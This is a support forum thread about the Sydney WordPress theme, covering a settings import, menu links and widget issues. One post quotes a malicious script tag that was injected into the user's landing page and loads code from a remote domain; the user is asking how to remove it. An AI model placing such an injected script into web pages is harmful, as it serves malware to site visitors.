Problems since importing sydney-settings.xml

I had a great website using Sydney template until I imported sydney-settings.xml - I need to reverse that action because it has added templates pages such as clients, testimonials, services, etc and this seemed to replace my own pages.

I don’t like the look of the templates and I just want to delete them but there isn’t any indication that these are deleteable. I only want my pages to be linked to the menu and have no need for these new template pages.

My pages are in the dashboard but have disappeared from view because now the menu must have been overridden with your new pages that you’ve added. I don’t know what to do. I have spent all weekend working on my site. Please help!!!

Chill :slight_smile:
The settings file simply adds some new custom post types. It doesn’t make anything disappear. Anyway, simply disable Types and they’ll disappear.
Why exactly did you import it if you don’t need it? It is shown on the documentation page what that file is for :slight_smile:

Thanks! Big help! I had to recreate the menu so my pages would reappear.

Actually - still having problems - if I click on click to enter, I want it to go to the Home page which is below the slider.

Secondly, if you click on Testimonials and Clients, it doesn’t navigate to those pages but instead goes to the slider.

You must realize I don’t know what you’re talking about. I’ll need to see your site.

www.larconsultancy.com

Vlad - ideally, I’d like the click to enter, to go to the home page, which is the text that appears below the slider.

Currently the Testimonial page is going to the Home Page, as is the Client page if I’m not mistaken.

1. If you go to Customize > Header Area > Header slider you’ll find an option to add your link. I assume you’ve been there before and removed #primary from that URL field which was doing exactly what you’re describing above.
  2. Have another look at the menu you created. Not really sure what you’ve done there. You can send me an admin account to vlad[at]athemes.com if you don’t figure it out.
  3. Please don’t use the Front Page template for pages where you don’t intent to use the Page Builder. As you can see it has no padding and it looks bad. It should be used only with page builder rows which bring their own padding.

Hi Vlad - apologies - I haven’t had time to study WordPress but intend to. I have added links before but it didn’t work - maybe it was the cache. Will see and if I don’t manage it will add u as a user - thanks!!!

Hi! I saw the video tutorial on how to import the sydney-settings.xml file but I didn’t find within the zip file.

There is another link to download?

Thanks.

Hi - there is a script on my landing page that is a virus and I need to remove it:

<script src=“http://g00.com.co/BtFVPd”></script> but I cannot find a way to access my website other than via wp-admin and that doesn’t go ‘deep’ enough.

How can I download my page, to remove the script, and then upload it again? This is rather urgent because anyone with a decent anti-virus cannot access my site - including myself.

Hello I need help I am using Widget Sydney

I follow your video thank you

the only thing that is not showing me is Categories from services and employees

What can I do